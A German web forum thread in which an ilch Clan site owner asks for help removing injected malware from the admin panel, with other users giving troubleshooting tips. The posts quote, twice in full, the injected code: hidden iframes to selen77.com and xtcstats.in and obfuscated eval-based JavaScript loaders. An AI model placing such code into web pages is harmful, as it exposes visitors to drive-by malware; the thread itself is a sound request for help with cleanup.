ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Virus Eingefangen

Geschlossen
  1. #1
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    seit Tagen bin ich am Entfernen eines Viruses vom Server.
    Nur noch im Admin Menü ist einer den bekomme ich nicht obwohl ich die Daten überspielt bzw. überschrieben habe.
    Er schreibt zwar admin.php aber dort ist er nicht.
    Hier der Quelltext:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    <html>
      <head>
        <title>ilch AdminMenu</title>
    	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
        <meta name="Copyright" content="Script Copyright by ilch.de" />
        <meta name="Page-topic" content="ilchClan - Clanscript" />
        <meta name="Audience" content="Alle" />
    
        <meta name="Robots" content="INDEX,FOLLOW" />
        <meta http-equiv="cache-control" content="no-cache" />
        <meta http-equiv="Pragma" content="no-cache" />
        <meta name="Robots" content="archive" />
        <link rel="stylesheet" type="text/css" href="include/admin/templates/style.css" />
        <script type="text/javascript" src="include/includes/js/JSCookMenu.js"></script>
        <link rel="stylesheet" href="include/admin/templates/JSCookMenu/theme.css" type="text/css" />
        <script type="text/javascript" src="include/admin/templates/JSCookMenu/theme.js"></script>
    
        
        <style type="text/css">
        
        ul.admix  {list-style: none;}
        ul.admix li ul { margin: 0; padding: 0; }
    
        ul.admix li ul li { display:block; float: left; padding: 5px; height: 76px; width: 80px; text-align: center; outline: 0px solid #faa;}
        ul.admix li ul li a {text-align:center;display: table-cell; display: inline-block; font-weight: bold; font-size: 11px; text-decoration: none;}
        ul.admix li ul li a img {display:block; margin: 0 auto 4px auto; width: 48px; height: 48px; }
    
        ul.admix  li.admix_box {width: 780px; font-size: 14px; font-weight: bold; border:1px solid #555753; text-align: center; margin-top: 10px; background: #eeeeec url(include/images/icons/admin/box_header.png) repeat-x left top; color: #eeeeec;}
    
        ul.admix_n li ul li a img {display:inline; width: 0px; height: 0px; }
    
        ul.admix li ul br.admix_last {clear: both; }
        ul.admix_n li ul br.admix_last {display: inline; margin:0; height:0; padding: 0;}
        
        </style>
        
    	<script type="text/javascript" src="include/includes/js/BBCodeGlobal.js"></script>
    <script type="text/javascript">
    var bbcodemaximagewidth = 500;
    var bbcodemaximageheight = 500;
    </script>
    </head>
      <body style="margin:0; padding: 0;">
        <script language="JavaScript" type="text/javascript">
    <!--
    
      function createNewUser() {
        var Fenster = window.open ('admin.php?user-createNewUser', 'createNewUser', 'status=yes,scrollbars=yes,height=200,width=350,left=300,top=50');
        Fenster.focus();
      }
    //-->
    </script><SCRIPT LANGUAGE="JavaScript"><!--
    var myMenu =
    [
        [null, 'Seite', './', null, null],
    
        [null, 'Admin', 'admin.php?admin', null, null,
                ['<img src="include/images/icons/admin/konfiguration.png" width="16" height="16">', 'Konfiguration', 'admin.php?allg', null, null],
                ['<img src="include/images/icons/admin/navigation.png" width="16" height="16">', 'Navigation', 'admin.php?menu', null, null],
                ['<img src="include/images/icons/admin/backup.png" width="16" height="16">', 'Backup', 'admin.php?backup', null, null],
                ['<img src="include/images/icons/admin/ranks.png" width="16" height="16">', 'Ranks', 'admin.php?range', null, null],
          ['<img src="include/images/icons/admin/smilies.png" width="16" height="16">', 'Smilies', 'admin.php?smilies', null, null],
          ['<img src="include/images/icons/admin/newsletter.png" width="16" height="16">', 'Newsletter', 'admin.php?newsletter', null, null],
          ['<img src="include/images/icons/admin/version_check.png" width="16" height="16">', 'Versions Kontrolle', 'admin.php?admin-versionsKontrolle', null, null],
          ['<img src="include/images/icons/admin/version_check.png" width="16" height="16">', 'Server Konfiguration', 'admin.php?checkconf', null, null],
          ['<img src="include/images/icons/admin/stats_site.png" width="16" height="16">', 'Statistik', null, null, null,
            ['<img src="include/images/icons/admin/stats_visitor.png" width="16" height="16">', 'Besucher', 'admin.php?admin-besucherStatistik', null, null],
            ['<img src="include/images/icons/admin/stats_site.png" width="16" height="16">', 'Seite', 'admin.php?admin-siteStatistik', null, null],
            ['<img src="include/images/icons/admin/stats_online.png" width="16" height="16">', 'Online', 'admin.php?admin-userOnline', null, null],
          ],
        ],
    
        [null, 'User', 'admin.php?user', null, null,
          ['<img src="include/images/icons/admin/user.png" width="16" height="16">', 'Verwalten', 'admin.php?user', null, null],
                ['<img src="include/images/icons/admin/user_rights.png" width="16" height="16">', 'Grundrechte', 'admin.php?grundrechte', null, null],
                ['<img src="include/images/icons/admin/user_profile_fields.png" width="16" height="16">', 'Profilefelder', 'admin.php?profilefields', null, null],
          ['<img src="include/images/icons/admin/user_add.png" width="16" height="16">', 'neuen User', 'javascript: createNewUser();',null ,null],
        ],
    
        [null, 'Eigene Box/Page', 'admin.php?selfbp', null, null],
    
        [null, 'Clanbox', null, null, null,
          ['<img src="include/images/icons/admin/wars_next.png" width="16" height="16">', 'Nextwars', 'admin.php?wars-next', null, null],
          ['<img src="include/images/icons/admin/wars_last.png" width="16" height="16">', 'Lastwars', 'admin.php?wars-last', null, null],
          ['<img src="include/images/icons/admin/teams.png" width="16" height="16">', 'Teams', 'admin.php?groups', null, null],
          ['<img src="include/images/icons/admin/awards.png" width="16" height="16">', 'Awards', 'admin.php?awards', null, null],
          ['<img src="include/images/icons/admin/kasse.png" width="16" height="16">', 'Kasse', 'admin.php?kasse', null, null],
          ['<img src="include/images/icons/admin/rules.png" width="16" height="16">', 'Rules', 'admin.php?rules', null, null],
          ['<img src="include/images/icons/admin/history.png" width="16" height="16">', 'History', 'admin.php?history', null, null],
          ['<img src="include/images/icons/admin/training_times.png" width="16" height="16">', 'Trainzeiten', 'admin.php?trains', null, null],
        ],
    
        [null, 'Content', null, null, null,
          ['<img src="include/images/icons/admin/news.png" width="16" height="16">', 'News', 'admin.php?news', null, null],
          ['<img src="include/images/icons/admin/forum.png" width="16" height="16">', 'Forum', 'admin.php?forum', null, null],
          ['<img src="include/images/icons/admin/downloads.png" width="16" height="16">', 'Downloads', 'admin.php?archiv-downloads', null, null],
          ['<img src="include/images/icons/admin/links.png" width="16" height="16">', 'Links', 'admin.php?archiv-links', null, null],
          ['<img src="include/images/icons/admin/gallery.png" width="16" height="16">', 'Gallery', 'admin.php?gallery', null, null],
          ['<img src="include/images/icons/admin/guestbook.png" width="16" height="16">', 'Gbook', 'admin.php?gbook', null, null],
          ['<img src="include/images/icons/admin/vote.png" width="16" height="16">', 'Umfrage', 'admin.php?vote', null, null],
          ['<img src="include/images/icons/admin/calendar.png" width="16" height="16">', 'Kalender', 'admin.php?kalender', null, null],
          ['<img src="include/images/icons/admin/contact.png" width="16" height="16">', 'Kontakt', 'admin.php?contact', null, null],
          ['<img src="include/images/icons/admin/imprint.png" width="16" height="16">', 'Impressum', 'admin.php?impressum', null, null],
          [null, 'Boxen', null, null, null,
            ['<img src="include/images/icons/admin/partners.png" width="16" height="16">', 'Partner', 'admin.php?archiv-partners', null, null],
            ['<img src="include/images/icons/admin/picofx.png" width="16" height="16">', 'Pic of X', 'admin.php?picofx', null, null],
          ],
        ],
    
        [null, 'Module', null, null, null,
    		[null, 'Ticker', 'admin.php?ticker', null, null],
    [null, 'BBCode 2.0', 'admin.php?bbcode', null, null],
        ]
    
    	];
    --></SCRIPT>
      
        <div class="Cmite" ID="myMenuID"></div>
    
      
        <div style="padding: 10px" class="Callg"><table width="100%" border="0" cellspacing="0" cellpadding="5" class="rand">
      <tr class="Chead">
        <td><b>Willkommen bei ilchClan - Administration!</b></td>
      </tr>
    
      <tr>
        <td class="Cnorm">
    
    
    
               <table width="100%"><tr><td valign="top" width="100%">
               <!--
               Hallo, hier k&ouml;nnen Sie alle m&ouml;glichen Einstellungen vornehmen.
               <br /><br />
               Wenn Sie Probleme haben sollten, oder irgendwie nicht weiter wissen, bitte
               kommen Sie uns doch auf <a href="http://www.ilch.de" target="_blank">www.ilch.de</a>
               besuchen, damit wir Ihnen helfen k&ouml;nnen.
               <br /><br />
               Auch wenn Sie Verbesserungsw&uuml;nsche oder eine geniale Idee haben,
               freuen wir uns &uuml;ber jeden Vorschlag.
               <br /><br />
               und jetzt <b>viel Spass mit dem Script!</b>
               -->
              <!-- </td><td valign="top" width="60%"> -->
               <br />
               <h3 style="display:inline;">Ein &Uuml;berblick &uuml;ber alle Inhalte</h3>
    
               <script type="text/javascript">
               function toggle_mimg()
               {
                   class_name = document.getElementById('cpm').className;
                   if(class_name == "admix")
                   {
                       class_name = "admix_n";
                       link_text = "Symbol-Ansicht";
                   }
                   else
                   {
                       class_name = "admix";
                       link_text = "Listen-Ansicht";
    
                   }
                   document.getElementById('cpm').className = class_name;
                   document.getElementById('list_toggle').innerHTML = link_text;
               }
               </script>
    
               <ul id="cpm" class="admix">
                 <li class="admix_box">Admin<br />
                   <ul>
                     <li><a href="admin.php?allg"><img src="include/images/icons/admin/konfiguration.png" alt="">Konfiguration</a></li>
                     				 <li><a href="admin.php?menu"><img src="include/images/icons/admin/navigation.png" alt="">Navigation</a></li>
                     <li><a href="admin.php?backup"><img src="include/images/icons/admin/backup.png" alt="">Backup</a></li>
    
                     <li><a href="admin.php?range"><img src="include/images/icons/admin/ranks.png" alt="">Ranks</a></li>
                     <li><a href="admin.php?smilies"><img src="include/images/icons/admin/smilies.png" alt="">Smiles</a></li>
                     <li><a href="admin.php?newsletter"><img src="include/images/icons/admin/newsletter.png" alt="">Newsletter</a></li>
                     <li><a href="admin.php?admin-versionsKontrolle"><img src="include/images/icons/admin/version_check.png" alt="">Versions Kontrolle</a></li>
                     <li><a href="admin.php?checkconf"><img src="include/images/icons/admin/version_check.png" alt="">Server Konfiguration</a></li>
                     <br class="admix_last"/>
    
                   </ul>
                 </li>
    	     <li class="admix_box">Statistik<br />
                       <ul>
                         <li><a href="admin.php?admin-besucherStatistik"><img src="include/images/icons/admin/stats_visitor.png" alt="">Besucher</a></li>
                         <li><a href="admin.php?admin-siteStatistik"><img src="include/images/icons/admin/stats_site.png" alt="">Seite</a></li>
                         <li><a href="admin.php?admin-userOnline"><img src="include/images/icons/admin/stats_online.png" alt="">Online</a></li>
    
                         <br class="admix_last"/>
                       </ul>
                     </li>
                 <li class="admix_box">Clanbox<br />
                   <ul>
                     <li><a href="admin.php?wars-last"><img src="include/images/icons/admin/wars_last.png" alt="" />Lastwars</a></li>
                     <li><a href="admin.php?wars-next"><img src="include/images/icons/admin/wars_next.png" alt="" />Nextwars</a></li>
    
                     <li><a href="admin.php?awards"><img src="include/images/icons/admin/awards.png" alt="" />Awards</a></li>
                     <li><a href="admin.php?kasse"><img src="include/images/icons/admin/kasse.png" alt="" />Kasse</a></li>
                     <li><a href="admin.php?rules"><img src="include/images/icons/admin/rules.png" alt="" />Rules</a></li>
                     <li><a href="admin.php?history"><img src="include/images/icons/admin/history.png" alt="" />History</a></li>
                     <li><a href="admin.php?groups"><img src="include/images/icons/admin/teams.png" alt="" />Teams</a></li>
                     <li><a href="admin.php?trains"><img src="include/images/icons/admin/training_times.png" alt="" />Trainzeiten</a></li>
    
                     <br class="admix_last"/>
                   </ul>
                 </li>
                 <li class="admix_box">User<br />
                   <ul>
                     <li><a href="admin.php?user"><img src="include/images/icons/admin/user.png" alt="">Verwalten</a></li>
                     <li><a href="admin.php?grundrechte"><img src="include/images/icons/admin/user_rights.png" alt="">Grundrechte</a></li>
    
                     <li><a href="admin.php?profilefields"><img src="include/images/icons/admin/user_profile_fields.png" alt="">Profilefelder</a></li>
                     <li><a href="javascript: createNewUser();"><img src="include/images/icons/admin/user_add.png" alt="">neuen User</a></li>
                     <br class="admix_last"/>
                   </ul>
                 </li>
                 <li class="admix_box">Content<br />
                   <ul>
    
                     <li><a href="admin.php?news"><img src="include/images/icons/admin/news.png" alt="">News</a></li>
                     <li><a href="admin.php?forum"><img src="include/images/icons/admin/forum.png" alt="">Forum</a></li>
                     <li><a href="admin.php?archiv-downloads"><img src="include/images/icons/admin/downloads.png" alt="">Downloads</a></li>
                     <li><a href="admin.php?archiv-links"><img src="include/images/icons/admin/links.png" alt="">Links</a></li>
                     <li><a href="admin.php?gallery"><img src="include/images/icons/admin/gallery.png" alt="">Gallery</a></li>
                     <li><a href="admin.php?vote"><img src="include/images/icons/admin/vote.png" alt="">Umfrage</a></li>
    
                     <li><a href="admin.php?kalender"><img src="include/images/icons/admin/calendar.png" alt="">Kalender</a></li>
                     <li><a href="admin.php?contact"><img src="include/images/icons/admin/contact.png" alt="">Kontakt</a></li>
                     <li><a href="admin.php?impressum"><img src="include/images/icons/admin/imprint.png" alt="">Impressum</a></li>
                     <li><a href="admin.php?selfbp"><img src="include/images/icons/admin/self_page_box.png" alt="">Eigene Box/Page</a></li>
                     <li><a href="admin.php?gbook"><img src="include/images/icons/admin/guestbook.png" alt="">G&auml;stebuch</a></li>
                     <br class="admix_last"/>
    
                   </ul>
                 </li>
                 <li class="admix_box">Boxen<br />
                   <ul>
                     <li><a href="admin.php?picofx"><img src="include/images/icons/admin/picofx.png" alt="">PicOfX</a></li>
                     <li><a href="admin.php?archiv-partners"><img src="include/images/icons/admin/partners.png" alt="">Partner</a></li>
                     <br class="admix_last"/>
    
                   </ul>
                 </li>
                 <li class="admix_box">Module
                 <br /><ul><li><a href="admin.php?ticker"><img src="include/images/icons/admin/na.png" alt="">Ticker</a></li>
    <li><a href="admin.php?bbcode"><img src="include/images/icons/admin/bbcode.png" alt="">BBCode 2.0</a></li>
    <br class="admix_last"/></ul>             </li>
               </ul>
    
               </td></td></table>
    
    		</td>
      </tr>
    </table>
    
    
               </div>
    
        <center class="Cmite"><a href="http://www.ilch.de" target="_blank">Bereitgestellt von ilch.de</a></center>
    
        <a href="#" name="bot"></a>
    
        <SCRIPT LANGUAGE="JavaScript"><!--
          cmDraw ('myMenuID', myMenu, 'hbr', cmThemePanel, 'ThemePanel');
        --></SCRIPT>
      <iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>
    </body>
    </html>


    Unten die letzten Zeilen das ist der SPAM
    <iframe src="http://selen77.com/
    [code][/code]

    Wenn ich im Admin Menü auf User gehe oder Smilis bleibt der Werbebanner ("VIRUS") in der Mitte stehen.

    Was oder Wo soll ich noch suchen?

    betroffene Homepage: 1sta.de/HP
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Wie gesagt diese Werbung ist nur im Admin Menü zu sehen.
    Von der HP selbst habe ich weg bekommen.
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Naja sollte entweder in admin/templates/index.htm oder admin.php, ich tippe aber mal auf die index.htm da die besser ins Namensschema passt.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    1 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo Mairu,

    leider nichts gefunden!?
    Der ist gut Versteckt lächeln
    Suche schon jede einzelne Datei ab bzw. habe ja alles drüber kopiert.
    Bin am Verzweifeln.
    Nofalls gebe ich Dir mal meinen Zugang im Vertrauen
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hammer habe fast jede Datei durchsucht finde den Code nicht.
    Was mache ich falsch?
        <center class="Cmite"><a href="http://www.ilch.de" target="_blank">Bereitgestellt von ilch.de</a></center>
    
        <a href="#" name="bot"></a>
    
        <SCRIPT LANGUAGE="JavaScript"><!--
          cmDraw ('myMenuID', myMenu, 'hbr', cmThemePanel, 'ThemePanel');
        --></SCRIPT>
      [b]<iframe src="http://selen77.com/" width="1" height="1" frameborder="0"></iframe><script language="javascript" type="text/javascript">var O01='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PvUncuQ3YlJXakVWbpR3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var l0O=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function I0O(OII){var _1lO=l0O[0];var l10,I1I,_10O,l1O,O11,_1l0,_1ll,_110,IIO=0,_0Ol=l0O[1];do{l1O=_1lO[l0O[3]](OII[l0O[2]](IIO++));O11=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1l0=_1lO[l0O[3]](OII[l0O[2]](IIO++));_1ll=_1lO[l0O[3]](OII[l0O[2]](IIO++));_110=l1O<<18|O11<<12|_1l0<<6|_1ll;l10=_110>>16&0xff;I1I=_110>>8&0xff;_10O=_110&0xff;if(_1l0==64){_0Ol+=String[l0O[4]](l10);}else{if(_1ll==64){_0Ol+=String[l0O[4]](l10,I1I);}else{_0Ol+=String[l0O[4]](l10,I1I,_10O);};};} while(IIO<OII[l0O[5]]);return _0Ol;};function OIl(IO0){var OlO=l0O[1],IIO=0;for(IIO=IO0[l0O[5]]-1;IIO>=0;IIO--){OlO+=IO0[l0O[2]](IIO);};return OlO;};eval(I0O(OIl(O01)));</script>
    <script language="javascript" type="text/javascript">var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function O01(l1I){var lO1=OII[0];var I00,_0OI,OI1,OI0,I1I,l10,III,_010,O11=0,IOl=OII[1];do{OI0=lO1[OII[3]](l1I[OII[2]](O11++));I1I=lO1[OII[3]](l1I[OII[2]](O11++));l10=lO1[OII[3]](l1I[OII[2]](O11++));III=lO1[OII[3]](l1I[OII[2]](O11++));_010=OI0<<18|I1I<<12|l10<<6|III;I00=_010>>16&0xff;_0OI=_010>>8&0xff;OI1=_010&0xff;if(l10==64){IOl+=String[OII[4]](I00);}else{if(III==64){IOl+=String[OII[4]](I00,_0OI);}else{IOl+=String[OII[4]](I00,_0OI,OI1);};};} while(O11<l1I[OII[5]]);return IOl;};function IlO(OIO){var lIl=OII[1],O11=0;for(O11=OIO[OII[5]]-1;O11>=0;O11--){lIl+=OIO[OII[2]](O11);};return lIl;};eval(O01(IlO(IOO)));</script>
    <script language="javascript" type="text/javascript">var lO1='7kyJ+QHcpdyKnI3Yz9CP+IyN2YDMwITPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IOI=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _01O(_111){var _0l0=IOI[0];var _10l,I0O,_1IO,_1I0,OOI,Oll,l00,llO,O11=0,_1l0=IOI[1];do{_1I0=_0l0[IOI[3]](_111[IOI[2]](O11++));OOI=_0l0[IOI[3]](_111[IOI[2]](O11++));Oll=_0l0[IOI[3]](_111[IOI[2]](O11++));l00=_0l0[IOI[3]](_111[IOI[2]](O11++));llO=_1I0<<18|OOI<<12|Oll<<6|l00;_10l=llO>>16&0xff;I0O=llO>>8&0xff;_1IO=llO&0xff;if(Oll==64){_1l0+=String[IOI[4]](_10l);}else{if(l00==64){_1l0+=String[IOI[4]](_10l,I0O);}else{_1l0+=String[IOI[4]](_10l,I0O,_1IO);};};} while(O11<_111[IOI[5]]);return _1l0;};function _1Ol(O1l){var OlO=IOI[1],O11=0;for(O11=O1l[IOI[5]]-1;O11>=0;O11--){OlO+=O1l[IOI[2]](O11);};return OlO;};eval(_01O(_1Ol(lO1)));</script><iframe src="http://xtcstats.in/" width="1" height="1" frameborder="0"></iframe>[/b]
    </body>
    </html>
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hi,


    so habe ALLE Ordner und Daten auf mein PC gezogen.
    Dann nach dem Namen von diesem Werbebanner gesucht www.selen77.com
    Folgende Datein wurden gefunden die damit Infiziert waren:
    login.htm
    showtopic.htm
    Hat aber nichts gebracht.
    Suchte dann aud diese Art weiter auf den ganzen Ordnern und fand ca. weitere 50 solcher Einträge.
    Lösche gerade alles.


    Zuletzt modifiziert von 1sta am 21.12.2011 - 22:04:21
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    deinem_klodecke Mitglied
    Registriert seit
    23.11.2011
    Beiträge
    70
    Beitragswertungen
    0 Beitragspunkte
    mal ne frage wie hast dir den eingefangen?
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    Lord|Schirmer Administrator
    Registriert seit
    21.03.2007
    Beiträge
    7.638
    Beitragswertungen
    1193 Beitragspunkte
    Hast Du die von Mairu genannten Dateien durchsucht?
    STRG+F "selen"
    rules :: doku :: faq :: linkus
    1 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    eingefangen habe ich mir einen Werbebanner der sich auf jeder der 3 Domains/Seiten eingeschlichen hat.
    www.1sta.de
    www.1sta.de/HP
    www.clanking.eu
    Zu sehen auf dem Foto.
    Ist ein Russisches Werbebanner

    Vermutlich mit dem Programm Wordpress/Tinythump (Clanking.eu) oder wie das Addon heißt.


    Habe die Datein mit dem Editor durchsucht.
    Versuche es mal mit Strg+F
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    1sta Mitglied
    Registriert seit
    10.08.2011
    Beiträge
    22
    Beitragswertungen
    1 Beitragspunkte
    Hallo,

    leider nein auch nicht mit Strg.+F was gefunden?!
    :'(
    0 Mitglieder finden den Beitrag gut.
